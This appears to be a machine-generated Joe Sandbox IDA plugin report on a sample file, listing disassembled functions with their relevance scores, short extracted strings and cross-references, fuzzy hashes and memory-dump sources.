Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: %e6g$(a*c$=]$?m,o$CG$Gt$JG$N[$WH$]{$hi$kW$/)$S]$WQ$_Y$sm
API String ID: 0-1131134755
Opcode ID: 56db13346acbba55c0b76b07e8858921a50b0d3f6f74c4d92255b09320c613aa
Instruction ID: b80266b2c4270f67dd92b1dd9e45c55aa26a25360fb71b0ead6f4f06c1b1ebf9
Opcode Fuzzy Hash: 56db13346acbba55c0b76b07e8858921a50b0d3f6f74c4d92255b09320c613aa
Instruction Fuzzy Hash: 6052C7B804D385CAE270CF25D581B8EBAF1BB92744F609A1DE1ED9B255DB708045CFA3

Function 00DC9510 Relevance: 20.4, Strings: 16, Instructions: 427COMMON

Download Yara Rule

Strings

;IJK, xrefs: 00DC983E
?M0K, xrefs: 00DC9968
2A"_, xrefs: 00DC9980
pq, xrefs: 00DC99E0
G+X5, xrefs: 00DC9AF3
G'M!, xrefs: 00DC9ADB
B7U1, xrefs: 00DC9AFB
,A&C, xrefs: 00DC982E
B?Q9, xrefs: 00DC9B0B
L3Y=, xrefs: 00DC9B03
X/R), xrefs: 00DC9AEB
!E4G, xrefs: 00DC9836
8;, xrefs: 00DC9B13
O+f), xrefs: 00DC9634, 00DC963D
T#a-, xrefs: 00DC9AE3
z=Q?, xrefs: 00DC9826

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: !E4G$,A&C$2A"_$8;$;IJK$?M0K$B7U1$B?Q9$G'M!$G+X5$L3Y=$O+f)$T#a-$X/R)$pq$z=Q?
API String ID: 0-655414846
Opcode ID: 1871bbb4ba0209458a01bfd98a85b595b37a8d14c28d3d20627feed29965c7b2
Instruction ID: a3b91a1e959d2adc996d22046a2733a47cba98e577781a004f19c8c246d85539
Opcode Fuzzy Hash: 1871bbb4ba0209458a01bfd98a85b595b37a8d14c28d3d20627feed29965c7b2
Instruction Fuzzy Hash: 45F12CB0518382ABD310DF15D895A2ABBF4FF86B48F144D1CF5D99B252D334DA08CBA6

Function 00DCDD29 Relevance: 14.9, Strings: 11, Instructions: 1142COMMON

Download Yara Rule

Strings

)IgK, xrefs: 00DCE261
-M2O, xrefs: 00DCE25A
upH}, xrefs: 00DCDE8A, 00DCE798, 00DCDF4A
<Y.[, xrefs: 00DCE27D
=]+_, xrefs: 00DCE276
hX]N, xrefs: 00DCDDC7
{E, xrefs: 00DCE323
n\+H, xrefs: 00DCDDC0
%*+(, xrefs: 00DCE143
Y9N;, xrefs: 00DCE245
,Q?S, xrefs: 00DCE26F

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: %*+($)IgK$,Q?S$-M2O$<Y.[$=]+_$Y9N;$hX]N$n\+H$upH}${E
API String ID: 0-1557708024
Opcode ID: b8229ade853a104853d893d90c3f6bf35dfa36044a9c9cfab455d89e791bda0b
Instruction ID: e91f9fb227f5ab6471976aecedd8da4f1197d241367251865684cd9666fa071f
Opcode Fuzzy Hash: b8229ade853a104853d893d90c3f6bf35dfa36044a9c9cfab455d89e791bda0b
Instruction Fuzzy Hash: AF92D0B5E00206CFDB14CF69D851BAEBBB2FF49310F298169E455AB391D735AD01CBA0

Function 00DC098B Relevance: 10.8, Strings: 8, Instructions: 836COMMON

Download Yara Rule

Strings

qrqp, xrefs: 00DC1089
9.5^, xrefs: 00DC0F9F
gce/, xrefs: 00DC1073
,#15, xrefs: 00DC0F94
%*+(, xrefs: 00DC0A77, 00DC0A86
&> &, xrefs: 00DC0F89
cah`, xrefs: 00DC107E
{, xrefs: 00DC1502

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: %*+($&> &$,#15$9.5^$cah`$gce/$qrqp${
API String ID: 0-4102007303
Opcode ID: 5cd36f1c6b0e32363e1f4d8f72dc5c9299053a8e5373c8a519f3c63b2a9cbe4f
Instruction ID: 7e2d9b99e8a61fa9ab376c00fc78465f73257eab7993b7fd303bcea912886cb5
Opcode Fuzzy Hash: 5cd36f1c6b0e32363e1f4d8f72dc5c9299053a8e5373c8a519f3c63b2a9cbe4f
Instruction Fuzzy Hash: 3E6289B56083828BD730DF14D891BABBBE1FF96314F08492DE49A8B742D7759940CB63

Function 00DA1000 Relevance: 10.5, Strings: 7, Instructions: 1785COMMON

Download Yara Rule

Strings

gfff, xrefs: 00DA2297
gfff, xrefs: 00DA2226
0123456789abcdefxp, xrefs: 00DA1587, 00DA15F8
@, xrefs: 00DA2C40
0123456789ABCDEFXP, xrefs: 00DA157D, 00DA15EB
-, xrefs: 00DA21ED
gfff, xrefs: 00DA22E1

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff
API String ID: 0-2517803157
Opcode ID: 457748afb820f47aac5c7c8b2973c59cba5a7346f461e6d922cd4df5a64cb728
Instruction ID: c980abc46ce2dae61b32ad4ab940c16da0587a4368f107ea1b5e63557ae01ba5
Opcode Fuzzy Hash: 457748afb820f47aac5c7c8b2973c59cba5a7346f461e6d922cd4df5a64cb728
Instruction Fuzzy Hash: EFD2E2756083418FD718CE2DC49436ABBE2AFDA314F188A2DF4D98B391D734D945CBA2

Function 00F7C6FA Relevance: 10.3, Strings: 7, Instructions: 1559COMMON

Download Yara Rule

Strings

_Vd{, xrefs: 00F7CB10
H{rv, xrefs: 00F7D48E
WX|, xrefs: 00F7D62F
]8q, xrefs: 00F7CB94
D{k, xrefs: 00F7CE77
3)[k, xrefs: 00F7C859
z0], xrefs: 00F7D4C1

Memory Dump Source

Source File: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: 3)[k$H{rv$WX|$]8q$_Vd{$z0]$D{k
API String ID: 0-1635636441
Opcode ID: 6a441443d1617676ae69cd8dc07e73be37a5a2ab634fbe914d2eb210cfcfb4d3
Instruction ID: d965daf3dedcbf8d850e74f4c66c52c076e1edcdb9faffbc6892ea379ee7a509
Opcode Fuzzy Hash: 6a441443d1617676ae69cd8dc07e73be37a5a2ab634fbe914d2eb210cfcfb4d3
Instruction Fuzzy Hash: 23B2F4F36082049FE704AF2DEC8567ABBE5EF94720F168A3DEAC4C7344E63558058697

Function 00F72381 Relevance: 7.9, Strings: 5, Instructions: 1669COMMON

Download Yara Rule

Strings

1zwM, xrefs: 00F724B6
XS?, xrefs: 00F72BA0
uWvf, xrefs: 00F72C40
El+G, xrefs: 00F73193
-Sw*, xrefs: 00F734C8

Memory Dump Source

Source File: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: -Sw*$1zwM$El+G$XS?$uWvf
API String ID: 0-3517640657
Opcode ID: 336fd47b4137fd4d8eb9d1bf629736c4bbd7ec43581a4ae9d5176a5e5a65eacb
Instruction ID: bb45a0afc3767dcb7e2a4f1fa6f212766612243343d237048fd7d37eb1e65d98
Opcode Fuzzy Hash: 336fd47b4137fd4d8eb9d1bf629736c4bbd7ec43581a4ae9d5176a5e5a65eacb
Instruction Fuzzy Hash: 27B228F360C204AFE3046E2DEC8567AFBE9EF94320F1A853DE6C583744EA7558058697

Function 00F77517 Relevance: 7.9, Strings: 5, Instructions: 1669COMMON

Download Yara Rule

Strings

!uk0, xrefs: 00F7771C
03?, xrefs: 00F78946
_%v7, xrefs: 00F7858A
<w, xrefs: 00F78671
!ku, xrefs: 00F784F7

Memory Dump Source

Source File: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: !ku$!uk0$03?$_%v7$<w
API String ID: 0-2149809478
Opcode ID: ec808a464c5fe7a70b9a29b7bceba5474d1a2ee500216a7c7fb60b3d9a2fb69b
Instruction ID: c4e63fae5bf947ea1e86078fc32e9abf898a89c4b7256aada105dd90c0f4bdf8
Opcode Fuzzy Hash: ec808a464c5fe7a70b9a29b7bceba5474d1a2ee500216a7c7fb60b3d9a2fb69b
Instruction Fuzzy Hash: 97B238F390C204AFE3046E2DEC8567ABBE9EF94720F1A453DEAC4C7744EA3558058697

Function 00F831B5 Relevance: 7.8, Strings: 5, Instructions: 1583COMMON

Download Yara Rule

Strings

Xcl, xrefs: 00F8410F
V&, xrefs: 00F83F88
VS, xrefs: 00F841F7
>`O, xrefs: 00F83887, 00F838BC
8P?m, xrefs: 00F84380

Memory Dump Source

Source File: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: VS$8P?m$>`O$Xcl$V&
API String ID: 0-314182289
Opcode ID: e0cbbccb4752c97ef16295e89f9d6a61a866eef5206c75df6c52acebc2fc46c4
Instruction ID: 75643f5a043776a7c3a1ef8dab422933dd3dd0601aa4e786bf77a5bdf4cf1a50
Opcode Fuzzy Hash: e0cbbccb4752c97ef16295e89f9d6a61a866eef5206c75df6c52acebc2fc46c4
Instruction Fuzzy Hash: 9FB207F390C2009FE3046E29EC8567AFBE9EF94720F1A892DE6C4C7744EA3558458797

Function 00DA12F7 Relevance: 7.2, Strings: 5, Instructions: 922COMMON

Download Yara Rule

Strings

@, xrefs: 00DA3531
i, xrefs: 00DA28EA
0, xrefs: 00DA1E88
0, xrefs: 00DA243E
0, xrefs: 00DA1DC1

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: 0$0$0$@$i
API String ID: 0-3124195287
Opcode ID: f85b98fa5fddb06530a336c7faeaed10a2f209e4a88e238acc3a3aebd32cf0a4
Instruction ID: 8dbbed54da5ab9527063dd1e2b0d2ba6d7e7f2e6da4329ee3964b65a7e2caa6c
Opcode Fuzzy Hash: f85b98fa5fddb06530a336c7faeaed10a2f209e4a88e238acc3a3aebd32cf0a4
Instruction Fuzzy Hash: 6262D271A0C3818FC718CF29C49076ABBE1AFD6314F188E1DE8D987291D774D949CB62

Function 00DA164F Relevance: 6.7, Strings: 5, Instructions: 472COMMON

Download Yara Rule

Strings

+, xrefs: 00DA1573
0123456789abcdefxp, xrefs: 00DA1659
gfff, xrefs: 00DA1F3C
0123456789ABCDEFXP, xrefs: 00DA164F
gfff, xrefs: 00DA1F57

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
API String ID: 0-1123320326
Opcode ID: 461b397cb5b83a50f1c2e41d65dfe9e392076cd10051c05c102a44d51210ca58
Instruction ID: 53fad341921735e9da9b6c53793292d28cf01b7a733661c68d4960e270c3a8aa
Opcode Fuzzy Hash: 461b397cb5b83a50f1c2e41d65dfe9e392076cd10051c05c102a44d51210ca58
Instruction Fuzzy Hash: AFF1913560C3818FC715CE2DC48426AFBE2AFDA304F188A6DE4D987356D774D945CBA2

Function 00DA13A3 Relevance: 6.6, Strings: 5, Instructions: 390COMMON

Download Yara Rule

Strings

-, xrefs: 00DA1F23
0123456789abcdefxp, xrefs: 00DA13AD
gfff, xrefs: 00DA1F3C
0123456789ABCDEFXP, xrefs: 00DA13A3
gfff, xrefs: 00DA1F57

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
API String ID: 0-3620105454
Opcode ID: d48f0f643437e6d70b7b5ef53aba0b8863ff02f5a75603289dae4243d1e70fe0
Instruction ID: b08da5783f6e9b17fd60affe8d79eecfee38288bf76687599e6dd86e590b445e
Opcode Fuzzy Hash: d48f0f643437e6d70b7b5ef53aba0b8863ff02f5a75603289dae4243d1e70fe0
Instruction Fuzzy Hash: 9ED17E3560C7818FC719CE2DC48426AFBE2AFDA304F08CA6DE4D987356D634D949CB62

Function 00DCFD10 Relevance: 5.7, Strings: 4, Instructions: 667COMMON

Download Yara Rule

Strings

:, xrefs: 00DD0087
uvw, xrefs: 00DCFE95
m1s3, xrefs: 00DCFEC3, 00DCFECB
NA_I, xrefs: 00DD036D

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: :$NA_I$m1s3$uvw
API String ID: 0-3973114637
Opcode ID: 44b6022cbb20eb4f81c6dea1881d1656d9da529fea140397b05f8c62d6693881
Instruction ID: 5605ea5ba0723ef319752249be30a7964ce4fce9008cf3e209706cf8eda01701
Opcode Fuzzy Hash: 44b6022cbb20eb4f81c6dea1881d1656d9da529fea140397b05f8c62d6693881
Instruction Fuzzy Hash: D732AAB0508381DFD310DF29D880B2ABBE5EB8A314F188A5DF5D58B3A2D335D915CB62

Function 00DB3BE2 Relevance: 5.4, Strings: 4, Instructions: 431COMMON

Download Yara Rule

Strings

;z, xrefs: 00DB3C87
ss, xrefs: 00DB3C79
p, xrefs: 00DB3C80
%*+(, xrefs: 00DB3EC4

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: %*+($;z$p$ss
API String ID: 0-2391135358
Opcode ID: d1b1ccc6412d39ec643ae2faf6fa94ebd25b312010d1172ce59f3fe74b6f01d3
Instruction ID: 9a069a8259372ac05c0261e50044916ba117daf2dbe10d52430a94fd8cb60806
Opcode Fuzzy Hash: d1b1ccc6412d39ec643ae2faf6fa94ebd25b312010d1172ce59f3fe74b6f01d3
Instruction Fuzzy Hash: 17025CB4810B00DFD760EF29D986756BFF5FB06700F50895DE89A8B656E330E419CBA2

Function 00DC2260 Relevance: 5.4, Strings: 4, Instructions: 383COMMON

Download Yara Rule

Strings

lc, xrefs: 00DC2507
hu, xrefs: 00DC232F
sj, xrefs: 00DC2327
a|, xrefs: 00DC2317

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: a|$hu$lc$sj
API String ID: 0-3748788050
Opcode ID: 955a24b01dcf23d6183c75a24905952fc970f4a50e3ad9bdf7ed4b787d7a1cee
Instruction ID: 0ab6d6fdb5ef638ab9ffdb11df8d80d60e695bafb53a2b5c66d5e4fe0d9fc645
Opcode Fuzzy Hash: 955a24b01dcf23d6183c75a24905952fc970f4a50e3ad9bdf7ed4b787d7a1cee
Instruction Fuzzy Hash: 7CA17A744183428BC720DF18C891B2BB7F0FFA5754F589A0CE8D59B291E739D941CBA6

Function 00DCD7AF Relevance: 5.2, Strings: 4, Instructions: 213COMMON

Download Yara Rule

Strings

CV, xrefs: 00DCD98B
KV, xrefs: 00DCD97D
T>, xrefs: 00DCD984
